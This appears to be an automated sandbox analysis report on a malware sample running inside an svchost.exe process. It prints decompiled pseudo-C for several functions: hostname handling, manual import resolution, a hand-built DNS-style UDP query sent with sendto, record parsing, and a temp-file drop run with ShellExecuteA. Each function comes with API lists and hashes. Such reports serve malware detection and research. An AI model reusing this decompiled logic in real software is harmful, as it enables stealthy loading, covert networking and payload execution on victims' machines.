                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 3819781495-0
                                                                                • Opcode ID: 48bc5fd5470b3f7eb460961f892cd75bb11d65220703a5dbfe3a9616ae905392
                                                                                • Instruction ID: 6044be36c92ad11f718f126d700e5fc3097e0878452329d96a309219ffee1f94
                                                                                • Opcode Fuzzy Hash: 48bc5fd5470b3f7eb460961f892cd75bb11d65220703a5dbfe3a9616ae905392
                                                                                • Instruction Fuzzy Hash: 4CF0E2B2104618AFD7895FA6FDC9B393BE4E748392F100015F109C2AA1C72096D58F26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0012AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                0x0012ad1c
                                                                                0x0012ad24
                                                                                0x0012ad71
                                                                                0x0012ad74
                                                                                0x0012ad77
                                                                                0x0012ad88
                                                                                0x0012ad88
                                                                                0x00000000
                                                                                0x0012ad7f
                                                                                0x0012ad26
                                                                                0x0012ad29
                                                                                0x0012ad2c
                                                                                0x0012ad2f
                                                                                0x0012ad55
                                                                                0x0012ad35
                                                                                0x0012ad3d
                                                                                0x0012ad45
                                                                                0x0012ad4d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ad4d
                                                                                0x0012ad45
                                                                                0x00000000
                                                                                0x0012ad4f
                                                                                0x0012ad4f
                                                                                0x0012ad4f
                                                                                0x0012ad51
                                                                                0x0012ad52
                                                                                0x0012ad52
                                                                                0x0012ad53
                                                                                0x00000000
                                                                                0x0012ad53
                                                                                0x0012ad35
                                                                                0x0012ad60
                                                                                0x0012ad66
                                                                                0x0012ad69
                                                                                0x0012ad6b
                                                                                0x0012ad6b
                                                                                0x00000000

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0012AD1C
                                                                                • lstrlenA.KERNEL32(?), ref: 0012AD60
                                                                                • lstrlenA.KERNEL32(?), ref: 0012AD69
                                                                                • lstrcpyA.KERNEL32(?,LocalHost), ref: 0012AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 51521f5ea3614d5eeb951c34328fb8b1f1c243a5ac6b5b16ccaafe1c97d415d2
                                                                                • Instruction ID: efbe122ef45dd65c6226042dfd508b27968c9a84c8e818f3d0724aba1ff114da
                                                                                • Opcode Fuzzy Hash: 51521f5ea3614d5eeb951c34328fb8b1f1c243a5ac6b5b16ccaafe1c97d415d2
                                                                                • Instruction Fuzzy Hash: 930189248441ED5FDF3A06A8B844BE43F659F96706FD00056E0C0C7915D71488978753
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00124280 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00124280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00124000(E00123ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0012ECA5();
					E00123F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00123F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00123F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00123F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0012EBCC(_t73);
						 *_t74 = 0x61;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x13215a =  *0x13215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00123F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0012EC2E(_t74);
						E00123F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}
















                                                                                0x00124280
                                                                                0x00124290
                                                                                0x00124296
                                                                                0x0012429b
                                                                                0x001242b1
                                                                                0x001242ba
                                                                                0x001243c1
                                                                                0x001243ca
                                                                                0x001243cd
                                                                                0x00000000
                                                                                0x001243ce
                                                                                0x001242c0
                                                                                0x001242c3
                                                                                0x001242c8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001242dc
                                                                                0x001242e6
                                                                                0x00124300
                                                                                0x001243bb
                                                                                0x00000000
                                                                                0x00124318
                                                                                0x00124322
                                                                                0x0012432c
                                                                                0x00124333
                                                                                0x00124336
                                                                                0x00124342
                                                                                0x00124345
                                                                                0x00124350
                                                                                0x00124359
                                                                                0x0012435f
                                                                                0x00124366
                                                                                0x00124371
                                                                                0x00124375
                                                                                0x00124368
                                                                                0x00124368
                                                                                0x00124368
                                                                                0x00124384
                                                                                0x0012438a
                                                                                0x0012439a
                                                                                0x001243ab
                                                                                0x001243ae
                                                                                0x001243b5
                                                                                0x00000000
                                                                                0x001243b5
                                                                                0x00124300
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,001298FD,00000001,00000100,001322F8,0012A3C7), ref: 00124290
                                                                                • CloseHandle.KERNEL32(0012A3C7), ref: 001243AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 001243AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID:
                                                                                • API String ID: 1371578007-0
                                                                                • Opcode ID: dba0b5043320315b9d059805a29d7b1a37645cc8b7a7487a6f265f1628e184d8
                                                                                • Instruction ID: 50407ec5d43a71cfa3bdab5fe8a2a24d9010e2b2c712535f1e2b8476df9b5b85
                                                                                • Opcode Fuzzy Hash: dba0b5043320315b9d059805a29d7b1a37645cc8b7a7487a6f265f1628e184d8
                                                                                • Instruction Fuzzy Hash: E1418AB1C00229BBDB10EBA1ED86FAFBBB8EF54324F104555F615A2191D7348A60DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00126069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0012EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0012EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                0x00126071
                                                                                0x00126074
                                                                                0x0012607c
                                                                                0x0012607c
                                                                                0x00126082
                                                                                0x00126087
                                                                                0x00126099
                                                                                0x0012609c
                                                                                0x001260a2
                                                                                0x001260a4
                                                                                0x001261b2
                                                                                0x00000000
                                                                                0x001261b5
                                                                                0x001260aa
                                                                                0x001260ad
                                                                                0x001260b5
                                                                                0x001260b5
                                                                                0x001260b8
                                                                                0x001260ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001260c3
                                                                                0x001260c9
                                                                                0x001260cc
                                                                                0x001260cf
                                                                                0x001261ae
                                                                                0x001261ae
                                                                                0x001261ae
                                                                                0x001261ae
                                                                                0x00000000
                                                                                0x001261ae
                                                                                0x001260d5
                                                                                0x001260d5
                                                                                0x001260d8
                                                                                0x001260da
                                                                                0x001260ee
                                                                                0x001260fa
                                                                                0x001260dc
                                                                                0x001260dc
                                                                                0x001260e7
                                                                                0x001260e7
                                                                                0x00126101
                                                                                0x00126104
                                                                                0x00126106
                                                                                0x00000000
                                                                                0x0012610c
                                                                                0x0012610c
                                                                                0x00126112
                                                                                0x00126115
                                                                                0x00126118
                                                                                0x0012611b
                                                                                0x0012611d
                                                                                0x0012612d
                                                                                0x0012612d
                                                                                0x0012612f
                                                                                0x0012611f
                                                                                0x0012611f
                                                                                0x00126127
                                                                                0x00126127
                                                                                0x00126131
                                                                                0x00126133
                                                                                0x00126135
                                                                                0x0012618b
                                                                                0x0012618b
                                                                                0x0012618f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126191
                                                                                0x0012619e
                                                                                0x001261a4
                                                                                0x001261a6
                                                                                0x001260b2
                                                                                0x00000000
                                                                                0x001260b2
                                                                                0x00000000
                                                                                0x00126137
                                                                                0x00126137
                                                                                0x0012613a
                                                                                0x0012613d
                                                                                0x0012613f
                                                                                0x0012613f
                                                                                0x0012615e
                                                                                0x00126164
                                                                                0x00126166
                                                                                0x00126173
                                                                                0x00126173
                                                                                0x00126176
                                                                                0x0012617a
                                                                                0x00126187
                                                                                0x00126187
                                                                                0x00126187
                                                                                0x00000000
                                                                                0x00126187
                                                                                0x00000000
                                                                                0x0012617a
                                                                                0x00126168
                                                                                0x0012616b
                                                                                0x0012616e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126170
                                                                                0x00126170
                                                                                0x00000000
                                                                                0x00126170
                                                                                0x0012614a
                                                                                0x00126150
                                                                                0x00000000
                                                                                0x0012617c
                                                                                0x0012617c
                                                                                0x0012617f
                                                                                0x00126181
                                                                                0x00126181
                                                                                0x00000000
                                                                                0x00126185
                                                                                0x00126135
                                                                                0x00126106
                                                                                0x00000000
                                                                                0x001260b5
                                                                                0x00000000

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,001264CF,00000000), ref: 0012609C
                                                                                • LoadLibraryA.KERNEL32(?,?,001264CF,00000000), ref: 001260C3
                                                                                • GetProcAddress.KERNEL32(?,00000014), ref: 0012614A
                                                                                • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0012619E
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 2438460464-0
                                                                                • Opcode ID: 9ff05ae0f9fb27a39af85f672fe8e81d3e0c84ab8d5758ca47a106cbfc562476
                                                                                • Instruction ID: 73c3eb80c470b7979b89b1f26fb1009ad13aa6ea332e756ea124b74817fb7fca
                                                                                • Opcode Fuzzy Hash: 9ff05ae0f9fb27a39af85f672fe8e81d3e0c84ab8d5758ca47a106cbfc562476
                                                                                • Instruction Fuzzy Hash: F9418C71A00225AFDB18CF58E884BA9B7F9EF54354F248068E815D7291E730FD60DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E00122923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00122816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0012EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00122871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0012EE2A(_t76, _t80, 0, 0x124);
							E0012EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                0x00122923
                                                                                0x00122931
                                                                                0x00122932
                                                                                0x00122935
                                                                                0x0012293b
                                                                                0x00122950
                                                                                0x00122957
                                                                                0x0012296a
                                                                                0x0012296e
                                                                                0x00122970
                                                                                0x00122973
                                                                                0x00122978
                                                                                0x00122a5b
                                                                                0x00122a5b
                                                                                0x00122a5e
                                                                                0x00000000
                                                                                0x00122a5e
                                                                                0x0012297e
                                                                                0x00122995
                                                                                0x001229ac
                                                                                0x001229ae
                                                                                0x001229b1
                                                                                0x001229b7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001229c1
                                                                                0x001229ca
                                                                                0x001229d6
                                                                                0x001229e0
                                                                                0x001229e2
                                                                                0x001229e6
                                                                                0x001229ee
                                                                                0x001229f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122a0a
                                                                                0x00122a0e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122a18
                                                                                0x00122a2a
                                                                                0x00122a33
                                                                                0x00122a36
                                                                                0x00122a38
                                                                                0x00122a3b
                                                                                0x00122a3e
                                                                                0x00122a43
                                                                                0x00122a4a
                                                                                0x00122a45
                                                                                0x00122a45
                                                                                0x00122a45
                                                                                0x00122a4c
                                                                                0x00122a55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122a55
                                                                                0x00000000
                                                                                0x0012297e
                                                                                0x00122959
                                                                                0x00000000
                                                                                0x00122959
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40be8cc45219dbf142d542c702ad92317575d8bf2040ff4f17fa68d25ad2a69d
                                                                                • Instruction ID: 57e6b82f50129eda3b177462374856f28c2c0977863fed85fdf3b859298ae44b
                                                                                • Opcode Fuzzy Hash: 40be8cc45219dbf142d542c702ad92317575d8bf2040ff4f17fa68d25ad2a69d
                                                                                • Instruction Fuzzy Hash: B031A071A00228BBDB219FA5EC81ABEB7F4FF58701F104456E505EB641E374DAA1CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 001226FF Relevance: 7.6, APIs: 5, Instructions: 96networkCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 26%
                                                                                			E001226FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x132bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0012EBCC(0x400);
					_pop(_t48);
					 *0x132bf8 = _t33;
				}
				E0012EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x132bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x132bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x132bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x132bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x132bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x132bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x132bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x132bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x132bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x132bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                0x00122704
                                                                                0x00122706
                                                                                0x0012270b
                                                                                0x00122715
                                                                                0x00122718
                                                                                0x0012271d
                                                                                0x0012271e
                                                                                0x0012271e
                                                                                0x00122726
                                                                                0x0012272e
                                                                                0x00122734
                                                                                0x0012273a
                                                                                0x00122740
                                                                                0x00122743
                                                                                0x0012274e
                                                                                0x00122752
                                                                                0x00122754
                                                                                0x0012275a
                                                                                0x0012275e
                                                                                0x00122764
                                                                                0x00122766
                                                                                0x0012276a
                                                                                0x00122770
                                                                                0x00122774
                                                                                0x0012277a
                                                                                0x0012277e
                                                                                0x00122784
                                                                                0x00122788
                                                                                0x0012278a
                                                                                0x0012278a
                                                                                0x0012278d
                                                                                0x001227a0
                                                                                0x00122795
                                                                                0x00122797
                                                                                0x0012279d
                                                                                0x00000000
                                                                                0x0012279d
                                                                                0x00000000
                                                                                0x00122795
                                                                                0x001227a9
                                                                                0x001227ad
                                                                                0x001227b9
                                                                                0x001227b3
                                                                                0x001227b7
                                                                                0x001227b8
                                                                                0x001227b8
                                                                                0x001227c2
                                                                                0x001227c4
                                                                                0x001227c4
                                                                                0x001227c5
                                                                                0x001227c7
                                                                                0x0012278a
                                                                                0x001227ce
                                                                                0x001227d2
                                                                                0x001227d2
                                                                                0x001227d5
                                                                                0x001227d7
                                                                                0x001227df
                                                                                0x001227e3
                                                                                0x001227e5
                                                                                0x001227f0
                                                                                0x00122802
                                                                                0x00122815

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0012272E
                                                                                • htons.WS2_32(00000001), ref: 00122752
                                                                                • htons.WS2_32(0000000F), ref: 001227D5
                                                                                • htons.WS2_32(00000001), ref: 001227E3
                                                                                • sendto.WS2_32(?,00132BF8,00000009,00000000,00000010,00000010), ref: 00122802
                                                                                  • Part of subcall function 0012EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0012EBFE,7FFF0001,?,0012DB55,7FFF0001), ref: 0012EBD3
                                                                                  • Part of subcall function 0012EBCC: RtlAllocateHeap.NTDLL(00000000,?,0012DB55,7FFF0001), ref: 0012EBDA
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                • String ID:
                                                                                • API String ID: 1128258776-0
                                                                                • Opcode ID: 7627b38f58929985be96ac8e6049f7f0ad334ef06a7738a2f0fd93ca8a33e068
                                                                                • Instruction ID: bf74d693e8014422cead0a7a259a828a1614b7da96e491995da9cd0bd0eb69ec
                                                                                • Opcode Fuzzy Hash: 7627b38f58929985be96ac8e6049f7f0ad334ef06a7738a2f0fd93ca8a33e068
                                                                                • Instruction Fuzzy Hash: 4D312634244392BFD7109F74FC90E65B760EF29314B1A406DE8558B722D73398A6D710
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00129145 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00129145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00122544(0x1322f8,  &E001307A8, 0x66, 0xe4, 0xc8));
				E0012EE2A(_t23, 0x1322f8, 0, 0x100);
				_t20 = E00129064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                0x00129145
                                                                                0x00129166
                                                                                0x00129174
                                                                                0x0012917a
                                                                                0x00129180
                                                                                0x00129181
                                                                                0x001291a9
                                                                                0x001291b6
                                                                                0x001291c9
                                                                                0x001291d3
                                                                                0x00000000
                                                                                0x001291e1
                                                                                0x001291ea

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,001322F8), ref: 0012915F
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00129166
                                                                                • CharToOemA.USER32 ref: 00129174
                                                                                • wsprintfA.USER32 ref: 001291A9
                                                                                  • Part of subcall function 00129064: GetTempPathA.KERNEL32(00000400,?,00000000,001322F8), ref: 0012907B
                                                                                  • Part of subcall function 00129064: wsprintfA.USER32 ref: 001290E9
                                                                                  • Part of subcall function 00129064: CreateFileA.KERNEL32(001322F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012910E
                                                                                  • Part of subcall function 00129064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00129122
                                                                                  • Part of subcall function 00129064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0012912D
                                                                                  • Part of subcall function 00129064: CloseHandle.KERNEL32(00000000), ref: 00129134
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 001291E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
